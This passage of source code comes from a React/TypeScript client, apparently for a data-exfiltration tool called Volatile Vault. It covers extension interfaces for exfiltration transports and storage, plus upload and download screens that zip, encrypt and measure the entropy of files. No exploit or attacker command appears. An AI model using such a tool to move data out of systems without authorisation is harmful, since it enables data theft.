} 49 | getConfig(): ApiConfigBaseExfil { 50 | return { 51 | max_total_size: 1024 * 1024 * 1024, 52 | chunk_size: 1024 * 1024 * 1024, 53 | }; 54 | } 55 | 56 | downloadSingle( 57 | id: string, 58 | reportEvent?: ReportEvent | undefined 59 | ): Promise { 60 | throw new Error('Method not implemented.'); 61 | } 62 | uploadSingle( 63 | storage: string, 64 | data: ArrayBuffer, 65 | reportEvent?: ReportEvent | undefined 66 | ): Promise { 67 | throw new Error('Method not implemented.'); 68 | } 69 | downloadChunked( 70 | id: string, 71 | reportEvent?: ReportEvent | undefined 72 | ): Promise { 73 | throw new Error('Method not implemented.'); 74 | } 75 | uploadChunked( 76 | storage: string, 77 | data: ArrayBuffer, 
78 | reportEvent?: ReportEvent | undefined 79 | ): Promise { 80 | throw new Error('Method not implemented.'); 81 | } 82 | addHost(reportEvent: ReportEvent): Promise { 83 | throw new Error('Method not implemented.'); 84 | } 85 | removeHost(host: string, reportEvent: ReportEvent): Promise { 86 | throw new Error('Method not implemented.'); 87 | } 88 | get name(): string { 89 | return 'dummyexfil'; 90 | } 91 | get displayName(): string { 92 | return 'Dummy Exfiltration Transport'; 93 | } 94 | get description(): string { 95 | return "Non-functional dummy exfiltration transport. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to exfiltration extensions."; 96 | } 97 | } 98 | -------------------------------------------------------------------------------- /client/src/components/extensions/extension.tsx: -------------------------------------------------------------------------------- 1 | import Api, { 2 | ApiConfigBaseExfil, 3 | ApiConfigResponse, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | } from '../../utils/Api'; 7 | 8 | export type ExfilProviderCapabilities = 9 | | 'None' 10 | | 'UploadSingle' 11 | | 'DownloadSingle' 12 | | 'UploadChunked' 13 | | 'DownloadChunked' 14 | | 'AddHost' 15 | | 'RemoveHost'; 16 | 17 | // Callback used to provide live updates to the UI 18 | export type ReportEvent = ( 19 | category: string, 20 | content: string, 21 | variant?: 'error' | 'success' 22 | ) => void; 23 | 24 | export interface BasicInfoHolder { 25 | name: string; 26 | displayName: string; 27 | description: string; 28 | isPresent: (config: ApiConfigResponse) => boolean; 29 | isConfigurable: boolean; 30 | configView: ConfigFn; 31 | } 32 | 33 | export interface StorageExtension extends BasicInfoHolder { 34 | } 35 | 36 | export interface ExfilDownloadViewProps { 37 | storage: StorageExtension; 38 | } 39 | export interface ConfigViewProps { 40 | config: ApiConfigResponse; 41 | onChange: (config: ApiConfigResponse) => void; 42 | } 43 | 44 | export type ExfilDownloadFn = () => JSX.Element; 45 | export type ExfilUploadFn = (props: ExfilDownloadViewProps) => JSX.Element; 46 | export type ConfigFn = (props: ConfigViewProps) => JSX.Element; 47 | 48 | export interface ExfilExtension extends BasicInfoHolder { 49 | get capabilities(): ExfilProviderCapabilities[]; 50 | isPresent: () => boolean; 51 | getConfig: () => ApiConfigBaseExfil; 52 | 53 | get canDownloadSingle(): boolean; 54 | get canUploadSingle(): boolean; 55 | get canDownloadChunked(): boolean; 56 | get canUploadChunked(): boolean; 57 | get canAddHost(): boolean; 58 | get canRemoveHost(): boolean; 59 | 60 | // Custom views, only effective if overridden & booleans set 61 | downloadSingleView: ExfilDownloadFn; 62 | uploadSingleView: ExfilUploadFn; 63 | downloadChunkedView: ExfilDownloadFn; 64 | uploadChunkedView: ExfilUploadFn; 65 | 66 | // Backend API calls analogous to server\src\extensions\exfil\provider.ts 67 | downloadSingle: ( 68 | id: string, 69 | reportEvent?: ReportEvent 70 | ) => Promise; 71 | uploadSingle: ( 72 | storage: string, 73 | data: ArrayBuffer, 74 | reportEvent?: ReportEvent 75 | ) => Promise; 76 | downloadChunked: ( 77 | id: string, 78 | reportEvent?: ReportEvent 79 | ) => Promise; 80 | uploadChunked: ( 81 | storage: string, 82 | data: ArrayBuffer, 83 | reportEvent?: ReportEvent 84 | ) => Promise; 85 | addHost: (reportEvent: ReportEvent) => Promise; 86 | removeHost: (host: string, reportEvent: ReportEvent) => Promise; 87 | } 88 | 89 | export abstract class 
BaseExfilExtension implements ExfilExtension { 90 | protected api: Api; 91 | protected config: ApiConfigResponse; 92 | 93 | public constructor(api: Api, config: ApiConfigResponse) { 94 | this.api = api; 95 | this.config = config; 96 | } 97 | 98 | abstract get downloadSingleView(): ExfilDownloadFn; 99 | abstract get uploadSingleView(): ExfilUploadFn; 100 | abstract get downloadChunkedView(): ExfilDownloadFn; 101 | abstract get uploadChunkedView(): ExfilUploadFn; 102 | abstract get configView(): ConfigFn; 103 | 104 | abstract get capabilities(): ExfilProviderCapabilities[]; 105 | 106 | get canDownloadSingle(): boolean { 107 | return this.capabilities.indexOf('DownloadSingle') !== -1; 108 | } 109 | get canUploadSingle(): boolean { 110 | return this.capabilities.indexOf('UploadSingle') !== -1; 111 | } 112 | get canDownloadChunked(): boolean { 113 | return this.capabilities.indexOf('DownloadChunked') !== -1; 114 | } 115 | get canUploadChunked(): boolean { 116 | return this.capabilities.indexOf('UploadChunked') !== -1; 117 | } 118 | get canAddHost(): boolean { 119 | return this.capabilities.indexOf('AddHost') !== -1; 120 | } 121 | get canRemoveHost(): boolean { 122 | return this.capabilities.indexOf('RemoveHost') !== -1; 123 | } 124 | 125 | get isConfigurable(): boolean { 126 | return this.canAddHost || this.canRemoveHost; 127 | } 128 | 129 | abstract isPresent(): boolean; 130 | abstract getConfig(): ApiConfigBaseExfil; 131 | 132 | abstract downloadSingle( 133 | id: string, 134 | reportEvent?: ReportEvent | undefined 135 | ): Promise; 136 | abstract uploadSingle( 137 | storage: string, 138 | data: ArrayBuffer, 139 | reportEvent?: ReportEvent | undefined 140 | ): Promise; 141 | abstract downloadChunked( 142 | id: string, 143 | reportEvent?: ReportEvent | undefined 144 | ): Promise; 145 | abstract uploadChunked( 146 | storage: string, 147 | data: ArrayBuffer, 148 | reportEvent?: ReportEvent | undefined 149 | ): Promise; 150 | 151 | abstract addHost(reportEvent: ReportEvent): Promise; 152 | abstract removeHost(host: string, reportEvent: ReportEvent): Promise; 153 | 154 | abstract get name(): string; 155 | abstract get displayName(): string; 156 | abstract get description(): string; 157 | } -------------------------------------------------------------------------------- /client/src/components/extensions/storage/AwsS3.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, StorageExtension } from '../Extension'; 3 | 4 | export class AwsS3 implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return false; 7 | } 8 | get name(): string { 9 | return 'awss3'; 10 | } 11 | get displayName(): string { 12 | return 'AWS S3 Bucket'; 13 | } 14 | get description(): string { 15 | return 'File storage on an AWS S3 bucket. 
Files are removed after a configurable amount of time.'; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return ( 20 | config.storages.awss3 !== undefined && 21 | config.storages.awss3 !== null 22 | ); 23 | } 24 | get configView(): ConfigFn { 25 | throw new Error(`${this.name} is not configurable`); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /client/src/components/extensions/storage/DummyStorage.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, ConfigViewProps, StorageExtension } from '../Extension'; 3 | 4 | export class DummyStorage implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return true; 7 | } 8 | get name(): string { 9 | return 'dummystorage'; 10 | } 11 | get displayName(): string { 12 | return 'Dummy Storage'; 13 | } 14 | get description(): string { 15 | return "Non-functional dummy storage. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to storage extensions."; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return true; 20 | } 21 | get configView(): ConfigFn { 22 | return (props: ConfigViewProps) => <>Dummy config view; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /client/src/components/extensions/storage/FileSystem.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, StorageExtension } from '../Extension'; 3 | 4 | export class FileSystem implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return false; 7 | } 8 | get name(): string { 9 | return 'filesystem'; 10 | } 11 | get displayName(): string { 12 | return 'Built-in Filesystem'; 13 | } 14 | get description(): string { 15 | return 'File storage in the backend server. 
Files are removed after a configurable amount of time.'; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return ( 20 | config.storages.filesystem !== undefined && 21 | config.storages.filesystem !== null 22 | ); 23 | } 24 | get configView(): ConfigFn { 25 | throw new Error(`${this.name} is not configurable`); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /client/src/components/ui/CustomSteps.tsx: -------------------------------------------------------------------------------- 1 | import { StepIconProps } from '@mui/material/StepIcon'; 2 | import { Box, StepLabel, StepLabelProps, Typography } from '@mui/material'; 3 | 4 | const CustomStepIcon = (props: StepIconProps & { stepNumber: number }) => { 5 | const { active, completed, stepNumber } = props; 6 | 7 | return ( 8 | 20 | {stepNumber} 21 | 22 | ); 23 | }; 24 | 25 | const CustomStepLabel = (props: StepLabelProps & { stepNumber: number }) => { 26 | const { stepNumber, children, ...stepLabelProps } = props; 27 | 28 | return ( 29 | } 31 | {...stepLabelProps} 32 | > 33 | {children} 34 | 35 | ); 36 | }; 37 | 38 | export default CustomStepLabel; -------------------------------------------------------------------------------- /client/src/components/ui/EventTable.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | TableRow, 3 | TableCell, 4 | TableContainer, 5 | Paper, 6 | Table, 7 | TableHead, 8 | TableBody, 9 | } from '@mui/material'; 10 | import { createRef, useEffect } from 'react'; 11 | import { useTheme } from '@mui/material'; 12 | 13 | interface EventTableProps { 14 | entries: EventEntry[]; 15 | } 16 | export interface EventEntry { 17 | timestamp: Date; 18 | category: string; 19 | content: string; 20 | variant: 'error' | 'success' | undefined; 21 | } 22 | 23 | export function createLogEntry( 24 | category: string, 25 | content: string, 26 | variant?: 'error' | 'success' 27 | ): EventEntry { 28 | return { 29 | timestamp: new Date(Date.now()), 30 | category: category, 31 | content: content, 32 | variant: variant, 33 | }; 34 | } 35 | 36 | export default function EventTable({ entries }: EventTableProps) { 37 | const summaryRef = createRef(); 38 | 39 | useEffect( 40 | () => summaryRef.current?.scrollIntoView({ behavior: 'smooth' }), 41 | [entries] 42 | ); 43 | 44 | const theme = useTheme(); 45 | 46 | const createRow = (entry: EventEntry, idx: number) => { 47 | const backgroundColor = entry.variant 48 | ? entry.variant == 'success' 49 | ? theme.palette.success.main 50 | : theme.palette.error.main 51 | : undefined; 52 | const color = entry.variant 53 | ? theme.palette.getContrastText(backgroundColor as string) 54 | : theme.palette.text.primary; 55 | return ( 56 | 57 | 58 | {entry.timestamp.toISOString().split('T')[1].split('.')[0]} 59 | 60 | {entry.category} 61 | {entry.content} 62 | 63 | ); 64 | }; 65 | 66 | return ( 67 | <> 68 | 69 | 70 | 71 | 72 | Timestamp 73 | Category 74 | Details 75 | 76 | 77 | 78 | {entries.map(createRow)} 79 | 80 | 81 |
82 |
83 | 84 | ); 85 | } 86 | -------------------------------------------------------------------------------- /client/src/components/ui/GenericHttpDownload.tsx: -------------------------------------------------------------------------------- 1 | import React, { useEffect, useState } from 'react'; 2 | import EnterPassword from '../EnterPassword'; 3 | import { 4 | Box, 5 | Button, 6 | Paper, 7 | Stack, 8 | Table, 9 | TableBody, 10 | TableCell, 11 | TableContainer, 12 | TableHead, 13 | TableRow, 14 | TextField, 15 | Typography, 16 | } from '@mui/material'; 17 | import { enqueueSnackbar } from 'notistack'; 18 | import { formatSize } from '../../utils/Files'; 19 | import { decryptSymmetric } from '../../utils/Crypto'; 20 | import DownloadIcon from '@mui/icons-material/Download'; 21 | import { saveAs } from 'file-saver'; 22 | import jszip from 'jszip'; 23 | import moment from 'moment'; 24 | import { ExfilExtension } from '../extensions/Extension'; 25 | import { SelectedMode } from '../ModeSelector'; 26 | import EventTable, { createLogEntry, EventEntry } from './EventTable'; 27 | 28 | interface DownloadBlobProps { 29 | exfil: ExfilExtension; 30 | mode: SelectedMode; 31 | enabled?: boolean; 32 | onDownloaded: (id: string, blob: ArrayBuffer) => void; 33 | onExfilEvent: ( 34 | category: string, 35 | content: string, 36 | variant?: 'error' | 'success' 37 | ) => void; 38 | } 39 | 40 | function DownloadBlob({ 41 | exfil, 42 | mode, 43 | enabled = true, 44 | onDownloaded, 45 | onExfilEvent, 46 | }: DownloadBlobProps) { 47 | const [id, setId] = useState(''); 48 | const [canDownload, setCanDownload] = useState(false); 49 | const [canEdit, setCanEdit] = useState(true); 50 | const [downloadError, setDownloadError] = useState(''); 51 | 52 | const onIdChange = ( 53 | event: React.ChangeEvent 54 | ) => { 55 | setCanDownload(true); 56 | setDownloadError(''); 57 | setId(event.currentTarget.value); 58 | }; 59 | 60 | const onDownload = async () => { 61 | setCanDownload(false); 62 | setCanEdit(false); 63 | setDownloadError(''); 64 | try { 65 | //TODO: add EventTable! 66 | const res = 67 | mode == 'DownloadSingle' 68 | ? 
await exfil.downloadSingle(id, onExfilEvent) 69 | : await exfil.downloadChunked(id, onExfilEvent); 70 | 71 | enqueueSnackbar({ 72 | message: `Downloaded ${formatSize(res.data.byteLength)} of data!`, 73 | variant: 'success', 74 | }); 75 | onDownloaded(id, res.data); 76 | } catch (err) { 77 | enqueueSnackbar({ 78 | message: `Download failed: ${err}`, 79 | variant: 'error', 80 | }); 81 | setDownloadError('Download error'); 82 | setTimeout(() => { 83 | setCanDownload(true); 84 | setCanEdit(true); 85 | }, 3000); 86 | } 87 | }; 88 | 89 | return ( 90 | <> 91 | 92 | Download ID 93 | 94 | 95 | 104 | 111 | 112 | 113 | ); 114 | } 115 | 116 | interface DownloadProps { 117 | exfil: ExfilExtension; 118 | mode: SelectedMode; 119 | } 120 | 121 | export default function GenericHttpDownload({ exfil, mode }: DownloadProps) { 122 | interface FileInfo { 123 | name: string; 124 | date: Date; 125 | } 126 | const [id, setId] = useState(''); 127 | const [blob, setBlob] = useState(null); 128 | const [password, setPassword] = useState(''); 129 | const [canDecrypt, setCanDecrypt] = useState(true); 130 | const [isDecrypted, setIsDecrypted] = useState(false); 131 | const [files, setFiles] = useState([]); 132 | var [entries, setEntries] = useState([]); 133 | 134 | if (mode != 'DownloadChunked' && mode != 'DownloadSingle') 135 | throw new Error(`Unsupported mode ${mode}`); 136 | 137 | const doDecrypt = () => { 138 | setCanDecrypt(false); 139 | 140 | if (!blob) 141 | return enqueueSnackbar({ 142 | message: 'Downloaded data uninitialized', 143 | variant: 'error', 144 | }); 145 | if (blob.byteLength < 13) 146 | return enqueueSnackbar({ 147 | message: `Downloaded data insufficient (${blob.byteLength} bytes)`, 148 | variant: 'error', 149 | }); 150 | 151 | decryptSymmetric(blob.slice(12), blob.slice(0, 12), password) 152 | .then((res) => { 153 | setBlob(res); 154 | setIsDecrypted(true); 155 | enqueueSnackbar({ 156 | message: 'Successfully decrypted the data!', 157 | variant: 'success', 158 | }); 159 | }) 160 | .catch((err) => { 161 | enqueueSnackbar({ 162 | message: `Error decrypting data: ${ 163 | err?.message ?? 'General failure' 164 | }`, 165 | variant: 'error', 166 | }); 167 | setCanDecrypt(true); 168 | }); 169 | }; 170 | 171 | useEffect(() => { 172 | if (!isDecrypted) return; 173 | const zip = jszip(); 174 | zip.loadAsync(blob as ArrayBuffer).then((_zip) => { 175 | setFiles( 176 | Object.keys(_zip.files).map((name) => { 177 | return { name: name, date: _zip.files[name].date }; 178 | }) 179 | ); 180 | }); 181 | }, [isDecrypted]); 182 | 183 | const save = () => { 184 | saveAs(new Blob([blob as ArrayBuffer]), `${id}.zip`); 185 | }; 186 | 187 | const addEntry = ( 188 | category: string, 189 | content: string, 190 | variant?: 'error' | 'success' 191 | ) => { 192 | entries = [...entries, createLogEntry(category, content, variant)]; 193 | setEntries(entries); 194 | }; 195 | 196 | return ( 197 | 198 | { 202 | setBlob(blob); 203 | setId(id); 204 | }} 205 | enabled={blob == null} 206 | onExfilEvent={addEntry} 207 | /> 208 | 213 | 220 | 221 | 222 | 223 | Contents 224 | 225 | 226 | 227 | 228 | 229 | 230 | Name 231 | Date 232 | 233 | 234 | 235 | {files.map((f, i) => ( 236 | 237 | {f.name} 238 | 239 | {moment(f.date).format('YYYY MM DD - HH:mm:ss')} 240 | 241 | 242 | ))} 243 | 244 |
245 |
246 | 247 | 256 | 257 | 258 | 259 | Log 260 | 261 | 262 | 263 |
264 | ); 265 | } 266 | -------------------------------------------------------------------------------- /client/src/components/ui/GenericHttpUpload.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | TableContainer, 3 | Paper, 4 | Table, 5 | TableHead, 6 | TableRow, 7 | TableCell, 8 | TableBody, 9 | IconButton, 10 | Typography, 11 | useTheme, 12 | Button, 13 | Stepper, 14 | Step, 15 | StepLabel, 16 | Grid, 17 | Box, 18 | Stack, 19 | Alert, 20 | AlertTitle, 21 | } from '@mui/material'; 22 | import React, { createRef, useEffect, useMemo, useState } from 'react'; 23 | import { useDropzone } from 'react-dropzone'; 24 | import DeleteIcon from '@mui/icons-material/Delete'; 25 | import CheckIcon from '@mui/icons-material/Check'; 26 | import jszip from 'jszip'; 27 | import { encryptSymmetric } from '../../utils/Crypto'; 28 | import { enqueueSnackbar } from 'notistack'; 29 | import moment from 'moment'; 30 | import EnterPassword from '../EnterPassword'; 31 | import { calcSize, formatSize } from '../../utils/Files'; 32 | import { fromArrayBuffer } from '../../utils/Entropy'; 33 | import { ExfilExtension, StorageExtension } from '../extensions/Extension'; 34 | import EventTable, { createLogEntry, EventEntry } from './EventTable'; 35 | import { SelectedMode } from '../ModeSelector'; 36 | 37 | interface FileSelectionProps { 38 | onFilesSelected: (files: File[]) => void; 39 | } 40 | 41 | function FileSelection({ onFilesSelected }: FileSelectionProps) { 42 | const baseStyle = { 43 | flex: 1, 44 | display: 'flex', 45 | flexDirection: 'column' as const, 46 | alignItems: 'center', 47 | padding: '20px', 48 | borderWidth: 2, 49 | borderRadius: 8, 50 | borderColor: '#bbb', 51 | borderStyle: 'dashed', 52 | color: '#bdbdbd', 53 | outline: 'none', 54 | transition: 'border .24s ease-in-out', 55 | margin: '20px', 56 | }; 57 | 58 | const focusedStyle = { 59 | borderColor: '#2196f3', 60 | }; 61 | 62 | const acceptStyle = { 63 | borderColor: '#00e676', 64 | }; 65 | 66 | const rejectStyle = { 67 | borderColor: '#ff1744', 68 | }; 69 | 70 | const [selectedFiles, setSelectedFiles] = useState([]); 71 | const [entropies, setEntropies] = useState<{ [key: string]: number }>({}); 72 | 73 | const { 74 | acceptedFiles, 75 | getRootProps, 76 | getInputProps, 77 | isFocused, 78 | isDragAccept, 79 | isDragReject, 80 | } = useDropzone(); 81 | 82 | const style = useMemo( 83 | () => ({ 84 | ...baseStyle, 85 | ...(isFocused ? focusedStyle : {}), 86 | ...(isDragAccept ? acceptStyle : {}), 87 | ...(isDragReject ? 
rejectStyle : {}), 88 | }), 89 | [isFocused, isDragAccept, isDragReject] 90 | ); 91 | 92 | const summaryRef = createRef(); 93 | 94 | useEffect(() => { 95 | // Remove duplicates 96 | setSelectedFiles( 97 | selectedFiles 98 | .concat(acceptedFiles) 99 | .filter( 100 | (f, i, a) => 101 | i == a.length - 1 || 102 | a.slice(i + 1).findIndex((_f) => _f.name == f.name) === -1 103 | ) 104 | ); 105 | }, [acceptedFiles]); 106 | 107 | useEffect(() => { 108 | const updateEntropies = async () => { 109 | const res = await Promise.all( 110 | selectedFiles.map(async (file) => { 111 | if (Object.keys(entropies).findIndex((k) => k == file.name) === -1) { 112 | const data = await file.arrayBuffer(); 113 | entropies[file.name] = fromArrayBuffer(data); 114 | setEntropies({ ...entropies }); 115 | } 116 | return entropies; 117 | }) 118 | ); 119 | 120 | // Remove entries of files that were removed already 121 | if (res.length) 122 | setEntropies( 123 | Object.keys(res[res.length - 1]).reduce((res, key) => { 124 | if (selectedFiles.findIndex((f) => f.name == key) !== -1) 125 | res[key] = entropies[key]; 126 | return res; 127 | }, {} as { [key: string]: number }) 128 | ); 129 | }; 130 | 131 | updateEntropies(); 132 | }, [selectedFiles]); 133 | 134 | useEffect(() => { 135 | summaryRef?.current?.scrollIntoView({ behavior: 'smooth' }); 136 | onFilesSelected(selectedFiles); 137 | }, [selectedFiles]); 138 | 139 | const handleRemove = (file: File) => { 140 | setSelectedFiles(selectedFiles.filter((f) => f != file)); 141 | }; 142 | 143 | const fileRows = selectedFiles.map((file) => ( 144 | 148 | 149 | {file.name} 150 | 151 | 152 | {Object.keys(entropies).findIndex((k) => k == file.name) !== -1 153 | ? entropies[file.name].toFixed(2) 154 | : 'n/a'} 155 | 156 | {formatSize(file.size)} 157 | 158 | handleRemove(file)} 162 | > 163 | 164 | 165 | 166 | 167 | )); 168 | 169 | const theme = useTheme(); 170 | 171 | // Add Ref for scrolling 172 | fileRows.push(); 173 | 174 | return ( 175 | <> 176 | 177 | Files 178 | 179 |
180 | 181 |

Drag 'n' drop some files here, or click to select files

182 |
183 | 184 | 185 | 186 | 187 | Name 188 | 189 | Entropy 190 | 191 | 192 | Size 193 | 194 | 195 | Action 196 | 197 | 198 | 199 | {selectedFiles && fileRows} 200 |
201 |
202 | 203 | 204 | {`Total: ${selectedFiles.length} files`} 205 | 206 | 207 | Size: {formatSize(calcSize(selectedFiles))} 208 | 209 | 210 | 211 | 219 | 220 | 221 | 222 | 223 | ); 224 | } 225 | 226 | interface DataInputProps { 227 | onFinished: (files: File[], password: string) => void; 228 | maxFileSize?: number; 229 | } 230 | 231 | function DataInput({ onFinished, maxFileSize }: DataInputProps) { 232 | const [files, setFiles] = useState([]); 233 | const [password, setPassword] = useState(''); 234 | 235 | const size = calcSize(files); 236 | 237 | return ( 238 | 239 | 240 | 241 | {maxFileSize && calcSize(files) > maxFileSize && ( 242 | 243 | Maximum file size A maximum of 244 | {formatSize(maxFileSize)} can be uploaded. The selected files will be 245 | compressed in the next step, however it may be ineffective when 246 | handling high-entropy data. You may want to consider selecting fewer 247 | files for this upload. 248 | 249 | )} 250 | 251 | 261 | 262 | 263 | ); 264 | } 265 | 266 | interface UploadInfo { 267 | id: string; 268 | lifeTime: number; 269 | } 270 | 271 | interface ProcessUploadProps { 272 | files: File[]; 273 | password: string; 274 | exfil: ExfilExtension; 275 | mode: SelectedMode; 276 | storage: StorageExtension; 277 | onFinished: (info: UploadInfo) => void; 278 | maxFileSize?: number; 279 | } 280 | 281 | function ProcessUpload({ 282 | files, 283 | password, 284 | exfil, 285 | mode, 286 | storage, 287 | onFinished, 288 | maxFileSize, 289 | }: ProcessUploadProps) { 290 | var [entries, setEntries] = useState([]); 291 | 292 | const [encData, setEncData] = useState(null); 293 | const [encIv, setEncIv] = useState(null); 294 | 295 | const addEntry = ( 296 | category: string, 297 | content: string, 298 | variant?: 'error' | 'success' 299 | ) => { 300 | entries = [...entries, createLogEntry(category, content, variant)]; 301 | setEntries(entries); 302 | }; 303 | 304 | useEffect(() => { 305 | const processFiles = async () => { 306 | const zipFile = jszip(); 307 | addEntry('Compression', 'Starting...'); 308 | await Promise.all( 309 | files.map(async (file) => { 310 | const data = await file.arrayBuffer(); 311 | zipFile.file(file.name, data, { date: new Date(file.lastModified) }); 312 | }) 313 | ); 314 | var lastFile = ''; 315 | var blob = await zipFile.generateAsync( 316 | { 317 | type: 'arraybuffer', 318 | compression: 'DEFLATE', 319 | compressionOptions: { level: 9 }, 320 | }, 321 | (meta) => { 322 | if (meta.currentFile && lastFile != meta.currentFile) { 323 | addEntry( 324 | 'Compression', 325 | `Processing "${meta.currentFile}" (${meta.percent.toFixed( 326 | Math.max(0, files.length.toString().length - 3) 327 | )}%)` 328 | ); 329 | lastFile = meta.currentFile; 330 | } 331 | } 332 | ); 333 | addEntry( 334 | 'Compression', 335 | `Done: compressed ${formatSize(calcSize(files))} to ${formatSize( 336 | blob.byteLength 337 | )} (entropy: ${fromArrayBuffer(blob).toFixed(2)})`, 338 | 'success' 339 | ); 340 | addEntry('Encryption', 'Starting...'); 341 | const [cipher, iv] = await encryptSymmetric(blob, password); 342 | addEntry( 343 | 'Encryption', 344 | `Done: ${formatSize(cipher.byteLength)} (entropy: ${fromArrayBuffer( 345 | cipher 346 | ).toFixed(2)})`, 347 | 'success' 348 | ); 349 | setEncData(cipher); 350 | setEncIv(iv); 351 | }; 352 | 353 | processFiles().catch((err) => { 354 | enqueueSnackbar({ 355 | message: `Processing failed: ${err?.message ?? JSON.stringify(err)}`, 356 | variant: 'error', 357 | }); 358 | addEntry('ERROR', err?.message ?? 
JSON.stringify(err), 'error'); 359 | }); 360 | }, []); 361 | 362 | useEffect(() => { 363 | if (!encData || !encIv) return; 364 | const performUpload = async () => { 365 | const data = encData as ArrayBuffer; 366 | const iv = encIv as ArrayBuffer; 367 | var tmp = new Uint8Array(data.byteLength + iv.byteLength); 368 | tmp.set(new Uint8Array(iv), 0); 369 | tmp.set(new Uint8Array(data), iv.byteLength); 370 | 371 | if (maxFileSize && tmp.byteLength > maxFileSize) { 372 | throw new Error( 373 | `File size ${formatSize( 374 | tmp.byteLength 375 | )} exceeds the allowed maximum of ${formatSize( 376 | maxFileSize 377 | )}; aborting.` 378 | ); 379 | } 380 | 381 | addEntry('Upload', 'Starting...'); 382 | const res = 383 | mode == 'UploadSingle' 384 | ? await exfil.uploadSingle(storage.name, tmp, addEntry) 385 | : await exfil.uploadChunked(storage.name, tmp, addEntry); 386 | addEntry('Upload', 'Done!', 'success'); 387 | enqueueSnackbar({ 388 | message: 'Upload finished!', 389 | variant: 'success', 390 | }); 391 | onFinished({ 392 | id: res.id as string, 393 | lifeTime: res.lifeTime as number, 394 | }); 395 | }; 396 | 397 | performUpload().catch((err) => { 398 | enqueueSnackbar({ 399 | message: `Upload failed: ${err?.message ?? JSON.stringify(err)}`, 400 | variant: 'error', 401 | }); 402 | addEntry('ERROR', err?.message ?? JSON.stringify(err), 'error'); 403 | }); 404 | }, [encData, encIv]); 405 | 406 | return ( 407 | <> 408 | 409 | 410 | ); 411 | } 412 | 413 | interface UploadInfoElementProps { 414 | info: UploadInfo; 415 | } 416 | 417 | function UploadInfoElement({ info }: UploadInfoElementProps) { 418 | const [remaining, setRemaining] = useState('00:00:00'); 419 | const [ownNowDate, _] = useState(moment()); 420 | 421 | useEffect(() => { 422 | const timer = setInterval(() => { 423 | const ownExpiryDate = moment(ownNowDate).add(info.lifeTime, 'ms'); 424 | const timeLeft = moment.duration(ownExpiryDate.diff(moment())); 425 | setRemaining(moment.utc(timeLeft.asMilliseconds()).format('HH:mm:ss')); 426 | }, 500); 427 | return () => clearInterval(timer); 428 | }, []); 429 | 430 | return ( 431 | <> 432 | 433 | 434 | Files successfully uploaded! 435 | Your download ID is {info.id}. Please note it down as it won't 436 | be shown to you again. 437 |
438 | The uploaded data will be removed in {remaining} without any further 439 | notice. 440 |
441 |
442 | 443 | ); 444 | } 445 | 446 | interface UploadProps { 447 | exfil: ExfilExtension; 448 | mode: SelectedMode; 449 | storage: StorageExtension; 450 | } 451 | 452 | export default function GenericHttpUpload({ 453 | exfil, 454 | storage, 455 | mode, 456 | }: UploadProps) { 457 | const [files, setFiles] = useState([]); 458 | const [password, setPassword] = useState(''); 459 | const [step, setStep] = useState(0); 460 | const [uploadInfo, setUploadInfo] = useState(null); 461 | 462 | if (mode != 'UploadChunked' && mode != 'UploadSingle') 463 | throw new Error(`Unsupported mode ${mode}`); 464 | 465 | const steps = ['Data Input', 'Process & Upload', 'Done']; 466 | 467 | const maxSize = exfil.getConfig().max_total_size; 468 | 469 | const getCurrentStepView = () => { 470 | switch (step) { 471 | case 0: 472 | return ( 473 | { 475 | setFiles(_files); 476 | setPassword(_password); 477 | setStep(1); 478 | }} 479 | maxFileSize={maxSize} 480 | /> 481 | ); 482 | case 1: 483 | case 2: 484 | return ( 485 | <> 486 | { 492 | setUploadInfo(info); 493 | setStep(2); 494 | }} 495 | maxFileSize={maxSize} 496 | mode={mode} 497 | /> 498 | {step == 2 && uploadInfo != null && ( 499 | 500 | )} 501 | 502 | ); 503 | default: 504 | return <>; 505 | } 506 | }; 507 | 508 | return ( 509 | <> 510 | 511 | {steps.map((label, index) => { 512 | const stepProps: { completed?: boolean } = {}; 513 | const labelProps: { 514 | optional?: React.ReactNode; 515 | } = {}; 516 | return ( 517 | 518 | {label} 519 | 520 | ); 521 | })} 522 | 523 | {getCurrentStepView()} 524 | 525 | ); 526 | } 527 | -------------------------------------------------------------------------------- /client/src/index.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import ReactDOM from 'react-dom/client'; 3 | import App from './App'; 4 | 5 | const root = ReactDOM.createRoot( 6 | document.getElementById('root') as HTMLElement 7 | ); 8 | root.render( 9 | // 10 | 11 | // 12 | ); 13 | -------------------------------------------------------------------------------- /client/src/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /client/src/react-app-env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | -------------------------------------------------------------------------------- /client/src/utils/Api.ts: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Config from './Config'; 3 | 4 | export interface ApiResponse { 5 | success: boolean; 6 | message: string; 7 | } 8 | 9 | export interface ApiGetAuthResponse extends ApiResponse {} 10 | 11 | export interface ApiAuthResponse extends ApiResponse { 12 | token?: string; 13 | } 14 | 15 | export interface ApiUploadResponse extends ApiResponse { 16 | id?: string; 17 | lifeTime?: number; 18 | } 19 | 20 | export interface ApiDownloadResponse extends ApiResponse { 21 | data: ArrayBuffer; 22 | } 23 | 24 | export interface ApiConfigResponse extends ApiResponse { 25 | storages: ApiConfigStorageCollection; 26 | exfils: ApiConfigExfilsCollection; 27 | } 28 | 29 | export interface ApiConfigExfilsCollection { 30 | basichttp?: ApiConfigItem; 31 | 